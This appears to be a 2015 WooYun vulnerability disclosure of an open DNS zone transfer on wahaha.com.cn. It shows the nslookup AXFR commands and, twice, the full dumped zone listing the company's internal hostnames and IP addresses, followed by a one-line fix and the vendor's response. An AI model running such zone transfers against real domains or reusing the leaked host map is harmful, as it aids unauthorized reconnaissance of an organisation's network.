乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-29: 细节已通知厂商并且等待厂商处理中 2015-07-04: 厂商已经主动忽略漏洞,细节向公众公开
RT
nslookup==>指定server为ns.wahaha.com.cn==>设置类型为axfr.之后如下
> set type=axfr> ls -d wahaha.com.cn[ns.wahaha.com.cn] wahaha.com.cn. SOA sanweb.wahaha.com.cn root.wahaha.com.cn(964089799 10800 3600 604800 86400) wahaha.com.cn. MX 0 tst.wahaha.com.cn wahaha.com.cn. NS ns.wahaha.com.cn wahaha.com.cn. NS sanweb.wahaha.com.cn 2013oa A 192.200.8.86 a8303c3a641fbcb4c2e0e811d9baa5f5 CNAME verify.wooyun.org aerla A 192.200.1.41 app A 192.200.2.234 apps A 192.200.16.171 apptest A 192.200.2.27 audit A 192.200.8.220 cas A 192.200.1.248 cf CNAME lo.wahaha.com.cn cfh A 192.200.2.67 clothing A 122.224.103.84 clothingh A 192.200.2.214 club CNAME www.wahaha.com.cn dns.itcitc.wahaha.com.cn A 192.200.10.8 cproject A 192.200.1.178 cus A 192.200.4.21 da A 192.200.1.23 dangjian A 192.200.1.212 data A 192.200.8.91 dee A 192.200.1.80 doc CNAME data.wahaha.com.cn domino MX 0 dominotst.wahaha.com.cn mail.domino A 192.200.8.53 dominotst A 192.200.8.58 e A 192.200.2.24 edison A 122.224.103.77 education A 122.224.103.72 education1 CNAME www.wahaha.com.cn ehr A 192.200.1.63 en CNAME www.wahaha.com.cn food.en CNAME www.wahaha.com.cn future.en CNAME www.wahaha.com.cn health.en CNAME www.wahaha.com.cn milk.en CNAME www.wahaha.com.cn tea.en CNAME www.wahaha.com.cn water.en CNAME www.wahaha.com.cn ep A 122.224.103.69 ep1 A 192.200.2.76 ep2 A 124.160.32.37 epbak A 202.107.206.221 epbak2 A 221.12.6.158 ephome A 192.200.2.77 eptest A 192.200.1.106 erp6 CNAME pre.wahaha.com.cn erp6-a A 192.200.1.28 erp6-app1 A 192.200.1.32 erp6-app2 A 192.200.1.33 erp6-app3 A 192.200.1.34 erp6-app4 A 192.200.1.35 erp6-b A 192.200.1.29 fgs A 192.200.1.236 food CNAME www.wahaha.com.cn future CNAME www.wahaha.com.cn fys CNAME www.wahaha.com.cn gcb A 192.200.1.198 guazi CNAME www.wahaha.com.cn guoru CNAME www.wahaha.com.cn health CNAME www.wahaha.com.cn helloc CNAME www.wahaha.com.cn hmz CNAME home.wahaha.com.cn home A 192.200.2.25 hr A 192.200.2.26 hr1 A 122.224.103.71 hr2 A 124.160.32.39 hrtest A 192.200.2.126 ides A 192.200.8.17 imss CNAME tst.wahaha.com.cn infovideo A 192.200.8.105 inserver A 61.153.6.59 iom A 192.200.1.118 itcitc NS dns.itcitc.wahaha.com.cn jijian A 122.224.103.81 jijian1 A 124.160.32.44 jijianh A 192.200.2.78 joinus CNAME love.wahaha.com.cn joinus2 CNAME hr1.wahaha.com.cn joinus2h CNAME hr.wahaha.com.cn joinush A 192.200.2.29 juice CNAME www.wahaha.com.cn kb CNAME hr.wahaha.com.cn kb2 CNAME hrtest.wahaha.com.cn kids A 122.224.103.88 kidsh A 192.200.2.46 kp A 192.200.2.67 lile CNAME www.wahaha.com.cn ljg CNAME www.wahaha.com.cn lo A 122.224.103.78 love A 122.224.103.76 m A 192.200.1.181 mail A 61.153.6.59 mailold A 202.107.206.218 mailtest A 192.200.8.185 manage CNAME www.wahaha.com.cn manage2 A 192.200.1.109 mengxiang A 122.224.103.76 mes A 192.200.1.101 mes1 A 192.200.1.101 mes2 A 192.200.1.177 mes3 A 192.200.1.212 mestest1 A 192.200.1.176 milk CNAME www.wahaha.com.cn mix CNAME kp.wahaha.com.cn mobile A 61.153.6.60 mofa A 192.200.1.13 mofb A 192.200.1.16 netscreen A 192.168.1.2 new CNAME lo.wahaha.com.cn ns A 60.12.5.28 OAServer A 192.200.2.25 pi A 192.200.8.42 pi2 A 192.200.8.43 pom A 122.224.103.72 pomh A 192.200.2.234 popmail A 192.200.8.184 portal A 192.200.1.105 pre A 192.200.1.26 q1 CNAME jijianh.wahaha.com.cn q7 CNAME jijian.wahaha.com.cn q71 CNAME jijian1.wahaha.com.cn q7h CNAME jijianh.wahaha.com.cn qae A 192.200.1.81 qcs CNAME mes.wahaha.com.cn sale CNAME salet.wahaha.com.cn sale2 CNAME saleu.wahaha.com.cn sale3 A 202.107.206.217 sale4 A 221.12.6.152 saleh A 192.200.2.39 salet A 122.224.103.79 saleu A 124.160.32.60 sametime A 61.175.197.141 sanweb A 61.153.6.58 scm CNAME lo.wahaha.com.cn shwater CNAME www.wahaha.com.cn slm A 192.200.8.19 smtp A 61.153.6.58 spmis A 192.200.11.253 srm A 122.224.103.87 srm2 A 124.160.32.57 srmh A 192.200.2.100 ss CNAME kp.wahaha.com.cn ssl A 192.200.8.111 ssl1 A 122.224.103.91 ssl2 A 124.160.32.59 sslh A 192.200.2.253 sunfire A 192.200.4.21 svn A 192.200.1.36 tea CNAME www.wahaha.com.cn test MX 0 mailtest.wahaha.com.cn tst A 61.175.197.139 tz CNAME www.wahaha.com.cn tzMallApp CNAME hr.wahaha.com.cn tzs CNAME srm.wahaha.com.cn tzsh CNAME srmh.wahaha.com.cn uyo CNAME www.wahaha.com.cn v2 A 192.200.8.140 w9 A 192.200.1.18 water CNAME www.wahaha.com.cn wccl A 122.224.103.72 wccl2 A 124.160.32.40 wcclh A 192.200.2.234 wcclpos A 192.200.1.210 whh A 192.200.2.24 whhtz A 122.224.103.83 whhtzh A 192.200.2.219 www A 122.224.103.73 wx A 124.160.32.58 wxh A 192.200.2.28 xcc CNAME www.wahaha.com.cn xsep A 122.224.103.70 youyou CNAME love.wahaha.com.cn zd A 122.224.103.70 zjssg CNAME jijian.wahaha.com.cn zjssg1 CNAME jijian1.wahaha.com.cn zjssgh CNAME jijianh.wahaha.com.cn wahaha.com.cn. SOA sanweb.wahaha.com.cn root.wahaha.com.cn(964089799 10800 3600 604800 86400)>
C:\Users\XXX>nslookup默认服务器: google-public-dns-a.gAddress: 8.8.8.8> server ns.wahaha.com.cn默认服务器: ns.wahaha.com.cnAddress: 60.12.5.28> set type=axfr> ls -d wahaha.com.cn[ns.wahaha.com.cn] wahaha.com.cn. SOA sanweb.wahaha.com.cn root.wahaha.com.cn(964089799 10800 3600 604800 86400) wahaha.com.cn. MX 0 tst.wahaha.com.cn wahaha.com.cn. NS ns.wahaha.com.cn wahaha.com.cn. NS sanweb.wahaha.com.cn 2013oa A 192.200.8.86 a8303c3a641fbcb4c2e0e811d9baa5f5 CNAME verify.wooyun.org aerla A 192.200.1.41 app A 192.200.2.234 apps A 192.200.16.171 apptest A 192.200.2.27 audit A 192.200.8.220 cas A 192.200.1.248 cf CNAME lo.wahaha.com.cn cfh A 192.200.2.67 clothing A 122.224.103.84 clothingh A 192.200.2.214 club CNAME www.wahaha.com.cn dns.itcitc.wahaha.com.cn A 192.200.10.8 cproject A 192.200.1.178 cus A 192.200.4.21 da A 192.200.1.23 dangjian A 192.200.1.212 data A 192.200.8.91 dee A 192.200.1.80 doc CNAME data.wahaha.com.cn domino MX 0 dominotst.wahaha.com.cn mail.domino A 192.200.8.53 dominotst A 192.200.8.58 e A 192.200.2.24 edison A 122.224.103.77 education A 122.224.103.72 education1 CNAME www.wahaha.com.cn ehr A 192.200.1.63 en CNAME www.wahaha.com.cn food.en CNAME www.wahaha.com.cn future.en CNAME www.wahaha.com.cn health.en CNAME www.wahaha.com.cn milk.en CNAME www.wahaha.com.cn tea.en CNAME www.wahaha.com.cn water.en CNAME www.wahaha.com.cn ep A 122.224.103.69 ep1 A 192.200.2.76 ep2 A 124.160.32.37 epbak A 202.107.206.221 epbak2 A 221.12.6.158 ephome A 192.200.2.77 eptest A 192.200.1.106 erp6 CNAME pre.wahaha.com.cn erp6-a A 192.200.1.28 erp6-app1 A 192.200.1.32 erp6-app2 A 192.200.1.33 erp6-app3 A 192.200.1.34 erp6-app4 A 192.200.1.35 erp6-b A 192.200.1.29 fgs A 192.200.1.236 food CNAME www.wahaha.com.cn future CNAME www.wahaha.com.cn fys CNAME www.wahaha.com.cn gcb A 192.200.1.198 guazi CNAME www.wahaha.com.cn guoru CNAME www.wahaha.com.cn health CNAME www.wahaha.com.cn helloc CNAME www.wahaha.com.cn hmz CNAME home.wahaha.com.cn home A 192.200.2.25 hr A 192.200.2.26 hr1 A 122.224.103.71 hr2 A 124.160.32.39 hrtest A 192.200.2.126 ides A 192.200.8.17 imss CNAME tst.wahaha.com.cn infovideo A 192.200.8.105 inserver A 61.153.6.59 iom A 192.200.1.118 itcitc NS dns.itcitc.wahaha.com.cn jijian A 122.224.103.81 jijian1 A 124.160.32.44 jijianh A 192.200.2.78 joinus CNAME love.wahaha.com.cn joinus2 CNAME hr1.wahaha.com.cn joinus2h CNAME hr.wahaha.com.cn joinush A 192.200.2.29 juice CNAME www.wahaha.com.cn kb CNAME hr.wahaha.com.cn kb2 CNAME hrtest.wahaha.com.cn kids A 122.224.103.88 kidsh A 192.200.2.46 kp A 192.200.2.67 lile CNAME www.wahaha.com.cn ljg CNAME www.wahaha.com.cn lo A 122.224.103.78 love A 122.224.103.76 m A 192.200.1.181 mail A 61.153.6.59 mailold A 202.107.206.218 mailtest A 192.200.8.185 manage CNAME www.wahaha.com.cn manage2 A 192.200.1.109 mengxiang A 122.224.103.76 mes A 192.200.1.101 mes1 A 192.200.1.101 mes2 A 192.200.1.177 mes3 A 192.200.1.212 mestest1 A 192.200.1.176 milk CNAME www.wahaha.com.cn mix CNAME kp.wahaha.com.cn mobile A 61.153.6.60 mofa A 192.200.1.13 mofb A 192.200.1.16 netscreen A 192.168.1.2 new CNAME lo.wahaha.com.cn ns A 60.12.5.28 OAServer A 192.200.2.25 pi A 192.200.8.42 pi2 A 192.200.8.43 pom A 122.224.103.72 pomh A 192.200.2.234 popmail A 192.200.8.184 portal A 192.200.1.105 pre A 192.200.1.26 q1 CNAME jijianh.wahaha.com.cn q7 CNAME jijian.wahaha.com.cn q71 CNAME jijian1.wahaha.com.cn q7h CNAME jijianh.wahaha.com.cn qae A 192.200.1.81 qcs CNAME mes.wahaha.com.cn sale CNAME salet.wahaha.com.cn sale2 CNAME saleu.wahaha.com.cn sale3 A 202.107.206.217 sale4 A 221.12.6.152 saleh A 192.200.2.39 salet A 122.224.103.79 saleu A 124.160.32.60 sametime A 61.175.197.141 sanweb A 61.153.6.58 scm CNAME lo.wahaha.com.cn shwater CNAME www.wahaha.com.cn slm A 192.200.8.19 smtp A 61.153.6.58 spmis A 192.200.11.253 srm A 122.224.103.87 srm2 A 124.160.32.57 srmh A 192.200.2.100 ss CNAME kp.wahaha.com.cn ssl A 192.200.8.111 ssl1 A 122.224.103.91 ssl2 A 124.160.32.59 sslh A 192.200.2.253 sunfire A 192.200.4.21 svn A 192.200.1.36 tea CNAME www.wahaha.com.cn test MX 0 mailtest.wahaha.com.cn tst A 61.175.197.139 tz CNAME www.wahaha.com.cn tzMallApp CNAME hr.wahaha.com.cn tzs CNAME srm.wahaha.com.cn tzsh CNAME srmh.wahaha.com.cn uyo CNAME www.wahaha.com.cn v2 A 192.200.8.140 w9 A 192.200.1.18 water CNAME www.wahaha.com.cn wccl A 122.224.103.72 wccl2 A 124.160.32.40 wcclh A 192.200.2.234 wcclpos A 192.200.1.210 whh A 192.200.2.24 whhtz A 122.224.103.83 whhtzh A 192.200.2.219 www A 122.224.103.73 wx A 124.160.32.58 wxh A 192.200.2.28 xcc CNAME www.wahaha.com.cn xsep A 122.224.103.70 youyou CNAME love.wahaha.com.cn zd A 122.224.103.70 zjssg CNAME jijian.wahaha.com.cn zjssg1 CNAME jijian1.wahaha.com.cn zjssgh CNAME jijianh.wahaha.com.cn wahaha.com.cn. SOA sanweb.wahaha.com.cn root.wahaha.com.cn(964089799 10800 3600 604800 86400)>
修改DNS服务器域传输配置。
危害等级:无影响厂商忽略
忽略时间:2015-07-04 14:02
2015-07-07:已修补
